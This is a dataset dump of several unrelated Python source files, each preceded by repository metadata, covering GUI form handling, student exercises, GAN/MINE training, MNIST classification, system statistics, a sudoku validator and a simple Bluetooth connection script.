        fields['title'] = sanitize(str(self.ui.titleLineEdit.text()).strip())
        fields['titleOfMusical'] = sanitize(str(self.ui.titleOfMusicalLineEdit.text()).strip())
        fields['composerArranger'] = sanitize(str(self.ui.composerLineEdit.text()).strip())
        # A timeEdit cannot hold arbitrary text, so no sanitizing is needed
        fields['performanceTime'] = str(self.ui.performanceTimeEdit.time().toString("m:ss"))
        return fields

    def changeDiscipline(self, text):
        """Re-enable/disable the fields to match the newly selected discipline."""
        handler = self.disciplines.get(str(text))
        if handler is not None:
            handler()

    def _configure_fields(self, musical, composer):
        """Enable/disable the 'title of musical' and composer fields,
        clearing whichever line edit gets disabled."""
        self.ui.titleOfMusicalLabel.setEnabled(musical)
        self.ui.titleOfMusicalLineEdit.setEnabled(musical)
        if not musical:
            self.ui.titleOfMusicalLineEdit.clear()
        self.ui.composerLabel.setEnabled(composer)
        self.ui.composerLineEdit.setEnabled(composer)
        if not composer:
            self.ui.composerLineEdit.clear()

    def dance(self):
        self._configure_fields(musical=False, composer=False)

    def piano(self):
        self._configure_fields(musical=False, composer=True)

    def choral(self):
        self._configure_fields(musical=False, composer=True)

    def vocal(self):
        self._configure_fields(musical=True, composer=True)

    def instrumental(self):
        self._configure_fields(musical=False, composer=True)

    def band(self):
        self._configure_fields(musical=False, composer=True)

    def speech(self):
        self._configure_fields(musical=False, composer=True)
| true |
bf495aa9b79388f997a0ef942b5e417f515a65ae | Python | hector81/Aprendiendo_Python | /Condicionales/NumeroMes.py | UTF-8 | 864 | 3.96875 | 4 | [] | no_license | numeroMes = 0
# Keep prompting until the user supplies a valid month number (1-12).
while numeroMes < 1 or numeroMes > 12:
    # read the number
    numeroMes = int(input('Escribe el número de mes '))
    if numeroMes < 1 or numeroMes > 12:
        print('El número debe ser entre 1 y 12')
    else:
        print('El número de mes corresponde a ')
        # Month names indexed by (number - 1); 'Enero ' keeps the original's
        # trailing space so the printed output is byte-identical.
        nombres = ('Enero ', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio',
                   'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre',
                   'Diciembre')
        print(nombres[numeroMes - 1])
| true |
f49cf0034a16d97bcaeb31d36452fd33ebb2590a | Python | Hitoshi-Nakanishi/MINE | /models/MINE_GANVDB/training.py | UTF-8 | 5,356 | 2.546875 | 3 | [] | no_license | from tqdm import tqdm
import numpy as np
import torch
import matplotlib.pyplot as plt
def update_target(ma_net, net, update_rate=1e-1):
    """Blend net's parameters into ma_net: ma <- (1 - rate) * ma + rate * net."""
    for ma_param, live_param in zip(ma_net.parameters(), net.parameters()):
        blended = (1.0 - update_rate) * ma_param.data + update_rate * live_param.data
        ma_param.data.copy_(blended)
def vib(mu, sigma, alpha=1e-8):
    """KL(N(mu, sigma^2) || N(0, 1)) averaged over all elements (variational
    information-bottleneck penalty); alpha guards the log against zero variance."""
    variance = sigma ** 2
    return 0.5 * torch.mean((mu ** 2) + variance - torch.log(variance + alpha) - 1)
def learn_discriminator(x, G, D , M, D_opt, BATCH_SIZE, zero_gp=True, vdb=True, USE_GPU=True):
    '''One discriminator update on a real batch plus a freshly generated batch.

    x : real samples, torch.Tensor
    G : Generator network
    D : Discriminator network; returns (probability, mu, sigma)
    M : Mutual Information Neural Estimation(MINE) network (unused here)
    D_opt : Optimizer of Discriminator
    zero_gp : add a zero-centered gradient penalty on real samples
    vdb : add the variational-information-bottleneck penalty
    Returns (gan_loss, gp_loss) as floats; gp_loss is 0 when zero_gp=False.
    '''
    z = torch.randn((BATCH_SIZE, 10))  # latent noise for the fake batch
    if USE_GPU:
        z = z.cuda()
        x = x.cuda()
    x_tilde = G(z)
    Dx_tilde, Dmu_tilde, Dsigma_tilde = D(x_tilde)
    if zero_gp:
        # zero centered gradient penalty : https://arxiv.org/abs/1801.04406
        x.requires_grad = True
        Dx, Dmu, Dsigma = D(x)
        grad = torch.autograd.grad(Dx, x, create_graph=True,
                                   grad_outputs=torch.ones_like(Dx),
                                   retain_graph=True, only_inputs=True)[0].view(BATCH_SIZE, -1)
        grad = grad.norm(dim=1)
        gp_loss = torch.mean(grad**2)
    else:
        Dx, Dmu, Dsigma = D(x)
    if vdb:
        # information bottleneck penalty on both real and fake statistics
        vib_loss = (vib(Dmu, Dsigma) + vib(Dmu_tilde, Dsigma_tilde))/2
    loss = 0.
    # standard discriminator cross-entropy loss
    gan_loss = - torch.log(Dx).mean() - torch.log(1-Dx_tilde).mean()
    loss += gan_loss
    if zero_gp:
        loss += 1.0 * gp_loss
    if vdb:
        loss += 0.1 * vib_loss
    D_opt.zero_grad()
    loss.backward()
    D_opt.step()
    if zero_gp:
        return gan_loss.item(), gp_loss.item()
    return gan_loss.item(), 0
def learn_generator(x, G, D, M, G_opt, G_ma, BATCH_SIZE, mi_obj=False, USE_GPU=True):
    '''One generator update, followed by an EMA update of G_ma.

    x : real samples, torch.Tensor (only moved to GPU here; not otherwise used)
    G : Generator network
    D : Discriminator network
    M : Mutual Information Neural Estimation(MINE) network
    G_opt : Optimizer of Generator
    G_ma : moving-average copy of G, refreshed after every step
    mi_obj : add the Mutual Information objective estimated by M
    Returns the generator GAN loss as a float.
    '''
    z = torch.randn((BATCH_SIZE, 10))
    z_bar = torch.narrow(torch.randn((BATCH_SIZE, 10)), dim=1, start=0, length=3)
    # z_bar is an independent draw, which is for the product distribution term.
    if USE_GPU:
        z = z.cuda()
        z_bar = z_bar.cuda()
        x = x.cuda()
    x_tilde = G(z)
    Dx_tilde, Dmu_tilde, Dsimga_tilde = D(x_tilde)
    loss = 0.
    gan_loss = torch.log(1-Dx_tilde).mean()  # minimax generator loss
    loss += gan_loss
    if mi_obj:
        z = torch.narrow(z, dim=1, start=0, length=3) # slice for MI
        # Donsker-Varadhan estimate: E[M(z,x)] - log E[exp(M(z_bar,x))]
        mi = torch.mean(M(z, x_tilde)) - torch.log(torch.mean(torch.exp(M(z_bar, x_tilde)))+1e-8)
        loss -= 0.01 * mi
    G_opt.zero_grad()
    loss.backward()
    G_opt.step()
    update_target(G_ma, G) # EMA GAN : https://arxiv.org/abs/1806.04498
    return gan_loss.item()
def learn_mine(G, M, M_opt, BATCH_SIZE, ma_rate=0.001, USE_GPU=True):
    '''One MINE update: M learns the mutual information between G's latent
    input (first 3 dims of z) and G's output.

    ma_rate : update rate for the moving average M.ma_et of E[exp(M)], used to
              de-bias the gradient of the log term.
    Returns the current mutual-information estimate as a float.
    '''
    z = torch.randn((BATCH_SIZE, 10))
    z_bar = torch.narrow(torch.randn((BATCH_SIZE, 10)), dim=1, start=0, length=3)
    if USE_GPU:
        z = z.cuda()
        z_bar = z_bar.cuda()
    x_tilde = G(z)
    et = torch.mean(torch.exp(M(z_bar, x_tilde)))
    if M.ma_et is None:
        M.ma_et = et.detach().item()
    M.ma_et += ma_rate * (et.detach().item() - M.ma_et)
    z = torch.narrow(z, dim=1, start=0, length=3) # slice for MI
    # Donsker-Varadhan bound with moving-average bias correction on the log term
    mutual_information = torch.mean(M(z, x_tilde)) - torch.log(et) * et.detach() / M.ma_et
    loss = - mutual_information
    M_opt.zero_grad()
    loss.backward()
    M_opt.step()
    return mutual_information.item()
def train(G, D, M, G_opt, G_ma, D_opt, M_opt, BATCH_SIZE, x, z_test,
          epoch_num=300, is_zero_gp=False, is_mi_obj=False, USE_GPU=True):
    """Full training loop: per epoch, update D, G and M on every mini-batch,
    then plot samples drawn from the moving-average generator G_ma.

    x : full training set (numpy array; shuffled in place each epoch)
    z_test : fixed latent batch used for the per-epoch scatter plot
    """
    for i in range(1, epoch_num+1):
        np.random.shuffle(x)  # in-place shuffle: the caller's array order changes
        iter_num = len(x) // BATCH_SIZE
        d_loss_arr, gp_loss_arr, g_loss_arr, mi_arr = [], [], [], []
        for j in tqdm(range(iter_num)):
            batch = torch.FloatTensor(x[BATCH_SIZE * j : BATCH_SIZE * j + BATCH_SIZE])
            d_loss, gp_loss = learn_discriminator(batch, G, D, M, D_opt, BATCH_SIZE,
                                                  zero_gp=is_zero_gp, USE_GPU=USE_GPU)
            g_loss = learn_generator(batch, G, D, M, G_opt, G_ma, BATCH_SIZE,
                                     mi_obj=is_mi_obj, USE_GPU=USE_GPU)
            mi = learn_mine(G, M, M_opt, BATCH_SIZE, USE_GPU=USE_GPU)
            d_loss_arr.append(d_loss)
            gp_loss_arr.append(gp_loss)
            g_loss_arr.append(g_loss)
            mi_arr.append(mi)
        print('D loss : {0}, GP_loss : {1} G_loss : {2}, MI : {3}'.format(
            round(np.mean(d_loss_arr),4), round(np.mean(gp_loss_arr)),
            round(np.mean(g_loss_arr),4), round(np.mean(mi_arr),4)))
        x_test = G_ma(z_test).data.cpu().numpy()
        plt.title('Epoch {0}'.format(i))
        plt.scatter(x_test[:,0], x_test[:,1], s=2.0)
        plt.xlim((-10, 10))
        plt.ylim((-10, 10))
        plt.show()
| true |
e0ab9dfbe350628cae2717ff8bf8ac165e8e6626 | Python | zhou-en/raspberry-pi-stats | /pi_stats.py | UTF-8 | 1,154 | 3.078125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python3
#-*- coding: utf-8 -*
import psutil
import math
to_gb = 1024*1024*1024
def get_cpu_stats():
    """Print physical core count, logical CPU count and per-CPU usage percentages."""
    print(f"Physical Cores:\t{psutil.cpu_count(logical=False)}")
    print(f"CPU Count:\t{psutil.cpu_count()}")
    cpu_percent = psutil.cpu_percent(percpu=True, interval=0.1)
    percent_labels = [f"{p}%" for p in cpu_percent]
    print(f"Percentages:\t{percent_labels}")
def get_memory_stats():
    """Print total and used virtual memory in GB."""
    vmem = psutil.virtual_memory()
    total_mem = vmem.total/to_gb
    used_mem = vmem.used/to_gb
    # Ceiling keeps the headline figure a whole number of GB.
    print(f"Total memory:\t{math.ceil(total_mem)} GB")
    # f-string formatting for consistency with the rest of the module.
    print(f"Memory used:\t{used_mem:.2f} GB")
def get_disk_stats():
    """Print disk usage statistics (total, used, percent) for /home."""
    path = "/home"
    disk_usage = psutil.disk_usage(path=path)
    # (Removed the unused `free` local the original computed but never used.)
    used = disk_usage.used / to_gb
    total = disk_usage.total / to_gb
    print(f"Disk Stats in {path}")
    print(f"Total:\t{total:.1f} GB")
    print(f"Used:\t{used:.1f} GB")
    print(f"Percent:\t{disk_usage.percent:.2f}")
def main():
    """Print every system-statistics section, separated by blank lines."""
    print("System Stats:")
    print("=============")
    sections = (get_cpu_stats, get_memory_stats, get_disk_stats)
    for index, section in enumerate(sections):
        if index:
            # Blank separator between sections, none after the last one.
            print("\n")
        section()

if __name__ == "__main__":
    main()
| true |
bcafb7ced9c4b5ab511cde2ce57323906608a4bc | Python | thpthp1/EECS_132 | /Java 132 assignment 3/Python translate/Number.py | UTF-8 | 483 | 3.328125 | 3 | [] | no_license | from Calculator import Calculator
class Number(Calculator):
    """A constant leaf in the calculator expression tree."""

    def __init__(self, value):
        # Double underscore (name mangling) keeps the constant private.
        self.__value = value

    def value(self, input = None):
        """Return the constant; the variable binding ``input`` is ignored."""
        return self.__value

    def derive(self):
        """The derivative of a constant is zero."""
        return Number(0)

    def __str__(self):
        return str(self.value())

    def __eq__(self, other):
        if isinstance(other, Number):
            return self.value() == other.value()
        # Let the other operand attempt its own comparison instead of
        # unconditionally reporting inequality (the original returned False).
        return NotImplemented

    def __hash__(self):
        # Defining __eq__ alone made instances unhashable; keep hashing
        # consistent with equality.
        return hash(self.value())
| true |
1b8c35308baba34526c12cb3b89705474a3ae8d4 | Python | anantSinghCross/handwritten-digit-recognition | /trainer.py | UTF-8 | 2,710 | 3.15625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
@author: anantSinghCross
"""
import pandas as pd
import numpy as np
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.utils import np_utils
import matplotlib.pyplot as plt
seed = 7
np.random.seed(seed)
# just for the spyder console window to display all tuples and cols
pd.options.display.max_columns = 100
pd.options.display.max_rows = 100
# Load the dataset; X_* are image arrays, Y_* are the digit labels.
(X_train,Y_train),(X_test,Y_test) = mnist.load_data()
print('Dataset has been loaded')
print('Shapes of training dataset are: X=',X_train.shape,'|| Y=',Y_train.shape)
# two samples from the training dataset plotted as images
plt.imshow(X_train[0])
plt.show()
plt.imshow(X_train[1])
plt.show()
# Flatten each 2-D image into a single row vector (3D dataset -> 2D).
num_pixels = X_train.shape[1]*X_train.shape[2]
X_train = X_train.reshape(X_train.shape[0],num_pixels).astype('float32')
X_test = X_test.reshape(X_test.shape[0],num_pixels).astype('float32')
# we'll now scale the inputs from 0-1 since here it's easy and a good idea.
# colors always range from 0-255 so we'll divide the inputs by 255
X_train = X_train/255
X_test = X_test/255
print('Y_train: ',Y_train)
# this is the one-hot encoding of categories( digits 0-9, here ). If you want to know more you can google it
# for now just remember that most of the ML algorithms don't work without one-hot encoding of categories.
Y_train = np_utils.to_categorical(Y_train)
Y_test = np_utils.to_categorical(Y_test)
print('Number of categories: ',Y_test.shape[1])
# Number of output classes, used to size the network's final layer.
num_categories = Y_test.shape[1]
# now we'll define a function where we create a Sequential model
# we'll be building a fairly simple model for this problem
def baseline_model():
    """Build and compile a single-hidden-layer softmax classifier.

    Relies on the module-level ``num_pixels`` and ``num_categories`` computed
    from the loaded dataset.
    """
    model = Sequential()
    model.add(Dense(num_pixels , input_dim = num_pixels , kernel_initializer = 'normal' , activation = 'relu'))
    model.add(Dense(num_categories , kernel_initializer = 'normal' , activation = 'softmax'))
    # compiling the model
    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
    return model
model = baseline_model()
# fitting the simple neural network model
model.fit(X_train, Y_train, validation_data = (X_test,Y_test),epochs = 10, batch_size = 200, verbose = 1)
# scores[1] is the accuracy metric declared in baseline_model's compile().
scores = model.evaluate(X_test, Y_test, verbose = 1)
print("Baseline Error: %.2f" % (100-scores[1]*100))
# now we'll save the keras model just so that we can use it
# whenever we want without the need to retrain it.
# Architecture goes to JSON, weights go to an HDF5 file.
model_json = model.to_json()
with open('model.json','w') as json_file:
    json_file.write(model_json)
model.save_weights('model.h5')
print('Model has been saved successfully')
b4633de1f6bcb8028f38202141d1937782ca588f | Python | feihong/feihong-setup | /bin/check-work-dirs.py | UTF-8 | 598 | 2.765625 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python3
"""
List directories in ~/work that have uncommitted changes.
"""
import os
import subprocess
from pathlib import Path
work_dir = Path.home() / 'work'

# Phrases a clean repository prints; git changed the wording from
# "working directory clean" to "working tree clean" in v2.10, so matching
# only the old phrase flagged every clean repo as dirty on modern git.
_CLEAN_MARKERS = ('working directory clean', 'working tree clean')

for dir_ in work_dir.iterdir():
    if dir_.is_dir():
        os.chdir(dir_)
        if (dir_ / '.git').exists():
            # Argument list instead of shell=True: no shell needed.
            result = subprocess.check_output(['git', 'status']).decode('utf-8')
            if not any(marker in result for marker in _CLEAN_MARKERS):
                print('{} contains uncommitted changes'.format(dir_))
        else:
            print('{} is not a git repository'.format(dir_))
| true |
4a3a992ed654ef3451204092a79cc59643271a44 | Python | DiasDogalakov/PP2_summer2020 | /5.py | UTF-8 | 85 | 2.765625 | 3 | [] | no_license | a = 1
b = "Hello world!!!"
c = 1j
# Report the runtime type of each sample value (int, str, complex).
for sample in (a, b, c):
    print(type(sample))
| true |
86384f85086b9ad3e831772210b98acf3b857c5d | Python | AndrewGiermak/python-challenge | /PyPoll/.main.py | UTF-8 | 1,860 | 3.3125 | 3 | [] | no_license | # import csv file
import os
import csv
import collections
from collections import Counter
filepath = os.path.join("learnpython","election_data1.csv")

# read file, header
with open("election_data1.csv", "r") as csvfile:
    csvreader = csv.reader(csvfile, delimiter=',')
    csvheader = next(csvreader)  # skip the header row
    # Tally one vote per row; the candidate name is the third column.
    Vote_Count = Counter(row[2] for row in csvreader)

Total_Votes = sum(Vote_Count.values())

# BUG FIX: the winner is the candidate with the most votes; the original
# reported Names[0], i.e. whichever candidate happened to appear first.
Winner = Vote_Count.most_common(1)[0][0]

# Build the report once and reuse it for both stdout and the text file
# (the original duplicated the report with hardcoded candidate names,
# which crashed or mislabeled results for any other dataset).
Answer = []
Answer.append("Election Results")
Answer.append("______")
Answer.append("Total Votes: " + str(Total_Votes))
Answer.append("______")
for Name, Votes in Vote_Count.items():
    Percent = Votes / Total_Votes * 100
    Answer.append(Name + ": " + str(round(Percent, 3)) + "% " + "(" + str(Votes) + ")")
Answer.append("______")
Answer.append("Winner: " + Winner)
print("\n".join(Answer))

# create the txt file for the output (same results, CRLF-separated,
# without the separator lines -- matching the original file layout).
text_path = "pypoll_results.txt"
with open(text_path, "w") as txt_file:
    lines = ["Election Results", "Total Votes: " + str(Total_Votes)]
    for Name, Votes in Vote_Count.items():
        Percent = Votes / Total_Votes * 100
        lines.append(Name + ": " + str(round(Percent, 3)) + "% " + "(" + str(Votes) + ")")
    lines.append("Winner: " + Winner)
    txt_file.write("\r\n".join(lines))
| true |
7467cfdbaa03714f91eb76f8b750850470091e79 | Python | KevinEca/AnalyseDunesFluviales | /Main.pyw | UTF-8 | 317 | 2.796875 | 3 | [] | no_license | from tkinter import Tk
from Interfaces import MenuPrincipal

# Build the application's root window.
fenetre = Tk()
fenetre.title("Menu principal - Analyse dunes 2018")
# Prevent the user from resizing the window.
fenetre.resizable(width=False, height=False)
# Hand control to the main-menu frame's event loop.
interface = MenuPrincipal.MenuPrincipal(fenetre)
interface.mainloop()
43edfbb5c366add021616a74b75aea4cf0d1c2ef | Python | PanZeYong/Python | /Python 编程从入门到实践/第 3 章 列表简介/motorcycles.py | UTF-8 | 1,388 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | motorcycles = ['honda', 'yamaha', 'suzuki']
# print(motorcycles)
# motorcycles[0] = 'ducati'
# print(motorcycles)
# # motorcycles.append('ducati')
# motorcycles.insert(0, 'ducati')
# print(motorcycles)
# del motorcycles[0]
# print(motorcycles)
# popped_motorcycle = motorcycles.pop()
# print(motorcycles)
# print(popped_motorcycle)
# last_owned = motorcycles.pop()
# print("The last motorcycle I owned was a " + last_owned.title() + ".")
# print(motorcycles.remove('honda'))
# persons = ['John', 'Marry', 'Jane', 'Jim']
# for i in range(len(persons)):
# print("Hello " + persons[i] + ", I want to invite you to eat dinner !");
# print(persons[1] + "无法赴约。")
# persons[1] = "Perry"
# for i in range(len(persons)):
# print("Hello " + persons[i] + ", I want to invite you to eat dinner !");
# print('---------------')
# persons.insert(0, 'Jack')
# persons.insert(2, 'Michael')
# persons.append('Parker')
# for i in range(len(persons)):
# print("Hello " + persons[i] + ", I want to invite you to eat dinner !");
# Demonstrate sorted() (returns a copy) versus the in-place list
# operations reverse() and sort().
addresses = ['New York', 'Japan', 'England', 'Fance', 'America']
print(addresses)                                 # original order
print(sorted(addresses))                         # ascending copy
print(addresses)                                 # unchanged
print(sorted(addresses, reverse=True))           # descending copy
print(addresses)                                 # still unchanged
addresses[:] = addresses[::-1]                   # in-place reversal
print(addresses)
print(addresses)
addresses[:] = addresses[::-1]                   # reverse back
print(addresses)
addresses[:] = sorted(addresses)                 # in-place ascending sort
print(addresses)
addresses[:] = sorted(addresses, reverse=True)   # in-place descending sort
print(addresses)
43270821add16af7e018f5deef11f86f373a0572 | Python | Oleksii1985/home_work_7 | /hw_7.py | UTF-8 | 2,331 | 3.421875 | 3 | [] | no_license | from collections import Counter
# Task 1
# Swap the first and last values, drop the second key and add a new entry --
# all in place, so id(dict_) stays the same throughout.
dict_ = {"name": "Oleksii", "surname": "Voitiuk", "age": 36, "gender": "male", "phone": "0967618604"}
print("dict_:", dict_)
print("id dict_:", id(dict_))
keys = list(dict_)
first_key, second_key, last_key = keys[0], keys[1], keys[-1]
dict_[first_key], dict_[last_key] = dict_[last_key], dict_[first_key]
print("dict_:", dict_)
print("id dict_:", id(dict_))
dict_.pop(second_key)
print(dict_)
print(id(dict_))
dict_["new_key"] = "new_value"
print(dict_)
print(id(dict_))
# Tasks 2-6: dictionary lookups and a filtered build.
student = {"name": "Emma", "class": 9, "marks": 75}
print(student.get("marks"))
# .get() returns None (not an error) for a missing key.
p = {"name": "Mike", "salary": 8000}
print(p.get("age"))
# Index into a list stored as a dictionary value.
sample = {"1": ["a", "b"], "2": ["c", "d"]}
print(sample["2"][1])
# Keep only the countries whose capital appears in list_2.
list_1 = ["Украина-Киев", "Россия-Сочи", "Беларусь-Минск", "Япония-Токио", "Германия-Мюнхен"]
list_2 = ["Киев", "Токио", "Минск"]
dict_ = {}
for entry in list_1:
    country, capital = entry.split('-')
    if capital in list_2:
        dict_[country] = capital
print(dict_)
# Task 7: substitution cipher over lowercase letters and space.
# NOTE(review): characters with no mapping (uppercase, digits, punctuation)
# are silently dropped by both branches -- confirm intended.
choice_method = input("Please enter your choice encrypt or decrypt ('e'/'d'): ")
# Plaintext character -> ciphertext character.
keys = {
    'a': "!", 'b': "z", 'c': "y", 'd': "x", 'e': "w", 'f': "v",
    'g': "u", 'h': "t", 'i': "s", 'j': "r", 'k': "q", 'l': "p",
    'm': "o", 'n': "-", 'o': "n", 'p': "m", 'q': "l", 'r': "k",
    's': "j", 't': "i", 'u': "1", 'v': "2", 'w': "3", 'x': "4",
    'y': "5", 'z': "6", ' ': "7"
}
if choice_method == "e":
    message = input("Please enter a message for encrypt: ")
    cipher_text = []
    message = list(message)
    # Substitute every mapped character of the message.
    for symbol in message:
        for key in keys:
            if key == symbol:
                cipher_text.append(keys[key])
    print(cipher_text)
elif choice_method == "d":
    message = input("Please enter code for decrypt: ")
    normal_text = []
    # Invert the table for decryption (the mapping is one-to-one).
    reverse_keys = {value: key for key, value in keys.items()}
    message = list(message)
    for symbol in message:
        for key in reverse_keys:
            if key == symbol:
                normal_text.append(reverse_keys[key])
    print(normal_text)
else:
    print("You put incorrect value!")
# Task 8: cubes of 1..10 keyed by the base.
dict_ = {}
for base in range(1, 11):
    dict_[base] = base ** 3
print(dict_)
# Task 9: per-character frequency of the string.
check_string = "gfalkglakgjklgkahjk"
result = Counter(check_string)
print("result is: ", result)
| true |
bc68bf01e96578c7c760d871e0b570c53801a1c8 | Python | AndyLee0310/108-1_Programming | /HW032.py | UTF-8 | 1,086 | 4.375 | 4 | [] | no_license | """
032. 數字穿插
給定一串數字,必須將該數字重新排序,
重新編排後,數字的左右兩側不能是自己,
且必須由小到大排序,
輸出的結果必須為最小的數字,
且符合左右兩側不能是自己的條件。
詳細說明:
假設給你一個1 2 2 3的數字,
左右不能是自己的條件狀況有,
1232 2132 2123 3212,
而輸出必須為其中最小數字,
所以答案是1232。
PS:題目不會有排不出來與Output超過int上限的情況
還有不會有兩位數以上的狀況如: 10 11 21(不過想挑戰的人可以試試看)
Input:
1 1 1 1 2 2 3 3
Output:
12121313
Input:
1 1 1 2 3 2 2 2 2
Output:
212121232
"""
import itertools
def test(b):
w = True
a = len(b)
for i in range(1,a-1):
if b[i] == b[i+1] or b[i] == b[i-1]:
w = False
break
return w
# Read the digits, try every distinct arrangement, keep the valid ones
# (no equal neighbours) and print the smallest resulting number.
nums = input().split()
x = list(set(itertools.permutations(nums)))
y = []
for i in range(len(x)):
    if test(x[i]):
        y.append(int(''.join(x[i])))
# NOTE(review): min() raises ValueError when no arrangement is valid; the
# problem statement promises this never happens -- confirm.
print(min(y))
ddcde7aecc5d5be7ebc6a4e4d92b3618da963d5e | Python | JosephLevinthal/Research-projects | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4083/codes/1601_1805.py | UTF-8 | 263 | 3.546875 | 4 | [] | no_license | xa = float(input("Digite a coordenada de xa"))
ya = float(input("Digite a coordenada de ya"))
xb = float(input("Digite a coordenada de xb"))
yb = float(input("Digite a coordenada de yb"))
xm = (xb + xa)/2
ym = (yb + ya)/2
print(round(xm, 1))
print(round(ym, 1)) | true |
0bfecf9b7951484f6ab3c60d4be84d2bcb2a0aba | Python | amirhaziemdev/ant-dev | /ant-master/Panda/ant-control.py | UTF-8 | 529 | 2.859375 | 3 | [] | no_license | #!/usr/bin/python
#Ant keyboard control, has user keyboard input etc.
import serial
import time
import keyboard
baud = 115200
text = ' '
ino_stop = bytes('e')
port = '/dev/ttyACM0' #COM* for Windows, /dev/ttyACM* for Ubuntu
arduino = serial.Serial(port, baud, timeout=.1)
time.sleep(1)
print "Press 'Q' to quit"
while True:
print "in the loop"
text = keyboard.read_key()
if(text=='q'):
break
text = bytes(text)
arduino.write(text)
time.sleep(2)
arduino.write(ino_stop)
print text
| true |
0d846ade03e6f00f9730654fea4b707253379787 | Python | sebastianBIanalytics/data_algebra | /data_algebra/eval_model.py | UTF-8 | 1,273 | 2.9375 | 3 | [] | no_license | from abc import ABC
class EvalModel(ABC):
    """Abstract base for engines that evaluate operator pipelines on data frames."""

    def __init__(self):
        pass

    def eval(self, ops, data_map, *, eval_env=None, narrow=True):
        """
        apply ops to data frames in data_map

        :param ops OperatorPlatform, operation to apply OperatorPlatform
        :param data_map map from data frame names to data frames
        :param eval_env environment to look for symbols in
        :param narrow logical, if True don't copy unexpected columns
        :return: result DataFrame
        """
        raise NotImplementedError("base class called")

    # noinspection PyPep8Naming
    def transform(self, ops, X, *, eval_env=None, narrow=True):
        """
        apply ops to data frame X, may or may not commute with composition

        :param ops OperatorPlatform, operation to apply
        :param X input data frame
        :param eval_env environment to look for symbols in
        :param narrow logical, if True don't copy unexpected columns
        :return: transformed DataFrame
        """
        tabs = ops.get_tables()
        # BUG FIX: the original used `is not 1` -- an identity comparison
        # against an int literal (a SyntaxWarning on modern CPython);
        # value inequality is what is meant.  Also fixed the "exaclty" typo.
        if len(tabs) != 1:
            raise ValueError("ops must use exactly one table")
        # The single table's name keys the data map handed to eval().
        tname = next(iter(tabs))
        return self.eval(ops, {tname: X}, eval_env=eval_env, narrow=narrow)
| true |
4b0b12440dc1ae1014dbac7a7d1f6fa16f0e08fc | Python | dufaultt/URI-Python-Solutions | /URI1235(Strings).py | UTF-8 | 607 | 3.078125 | 3 | [] | no_license | ##Tristan Dufault 2019-08-01
##https://www.urionlinejudge.com.br/judge/en/problems/view/1235
# For each of the given test cases, reverse the first half and the second
# half of the string independently (the middle character of an odd-length
# string stays put) and print the result.
# NOTE(review): `iter` shadows the builtin of the same name.
iter = int(input())
while(iter>0):
    s = input()
    sl = list(s)
    hsl = sl.copy()  # untouched copy to read source characters from
    half = (int(len(sl)/2))-1  # last index of the first half
    if((len(sl)%2) >0):
        # Odd length: reverse indices 0..half, skip the middle character,
        # then reverse the tail after the middle.
        for i in range(half+1):
            sl[i] = hsl[half-i]
        for i in range(int(len(sl)/2)+1,len(sl)):
            sl[i] = hsl[len(sl)+(int(len(sl)/2))-i]
    else:
        # Even length: reverse each half in place.
        for i in range(half+1):
            sl[i] = hsl[half-i]
        for i in range(half+1,len(sl)):
            sl[i] = hsl[len(sl)+half-i]
    ans = ''.join(sl)
    print(ans)
    iter-=1
| true |
0e11cdf72caf7574138ef80eefd70b0a06022abb | Python | takecian/ProgrammingStudyLog | /LeetCode/top-interview-questions/36.py | UTF-8 | 2,070 | 3.46875 | 3 | [] | no_license | # https://leetcode.com/problems/valid-sudoku/
import itertools
from collections import Counter
import bisect
class Solution:
    def isValidSudoku(self, board):
        """Return True when no row, column or 3x3 box of ``board`` contains
        a duplicate digit; '.' cells are ignored.

        Only the placed digits are validated -- the board need not be
        solvable.  The leftover debug ``print(board)`` from the original
        has been removed, and the three copies of the distinctness check
        are factored into one helper.
        """
        def _all_distinct(cells):
            # A unit is valid when every non-empty value occurs only once.
            digits = [c for c in cells if c != '.']
            return len(digits) == len(set(digits))

        # Rows.
        for row_cells in board:
            if not _all_distinct(row_cells):
                return False
        # Columns.
        for col in range(9):
            if not _all_distinct(board[row][col] for row in range(9)):
                return False
        # 3x3 sub-boxes.
        for box_row in range(0, 9, 3):
            for box_col in range(0, 9, 3):
                box = (board[box_row + dr][box_col + dc]
                       for dr in range(3) for dc in range(3))
                if not _all_distinct(box):
                    return False
        return True
def main():
    """Run the validator on a sample board and print the result.

    This board holds an "8" at [0][0] and [3][0] -- a duplicate in the
    first column -- so the expected output is False.
    """
    s = Solution()
    print(s.isValidSudoku([
        ["8","3",".",".","7",".",".",".","."],
        ["6",".",".","1","9","5",".",".","."],
        [".","9","8",".",".",".",".","6","."],
        ["8",".",".",".","6",".",".",".","3"],
        ["4",".",".","8",".","3",".",".","1"],
        ["7",".",".",".","2",".",".",".","6"],
        [".","6",".",".",".",".","2","8","."],
        [".",".",".","4","1","9",".",".","5"],
        [".",".",".",".","8",".",".","7","9"]
    ]))

if __name__ == '__main__':
    main()
| true |
c9c1f8ffa17094040193f7d738012c2954854123 | Python | Mark-Orban/BTTest | /BTTest.py | UTF-8 | 827 | 3.09375 | 3 | [] | no_license | import bluetooth
print("Searching for nearby devices...\n")

try:
    devices = bluetooth.discover_devices(lookup_names=True)
except Exception:
    # BUG FIX: the original bare `except:` printed "Error" but left
    # `devices` unbound, so the very next print/while raised NameError.
    # Fall back to an empty result so the retry loop below takes over.
    print("Error")
    devices = []
print(devices)
while devices == []:
    print("No bluetooth devices found")
    retry = input("Try again? Y/N: ")
    if retry.lower() == "n":
        exit()
    print("Searching for nearby devices...\n")
    devices = bluetooth.discover_devices(lookup_names=True)
# Present a numbered menu of (address, name) pairs.
num = 0
for addr, name in devices:
    num += 1
    print(num, ".", name, "-", addr)
device_selected = int(input("Select your device: ")) - 1
print("You have selected:", devices[device_selected][1])
addr = str(devices[device_selected][0])
port = 1
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
# NOTE(review): addr[2:19] assumes a particular string form of the
# address tuple -- confirm against the bluetooth library in use.
sock.connect((addr[2:19], port))

def test():
    sock.send(str.encode("Hello"))

test()
| true |
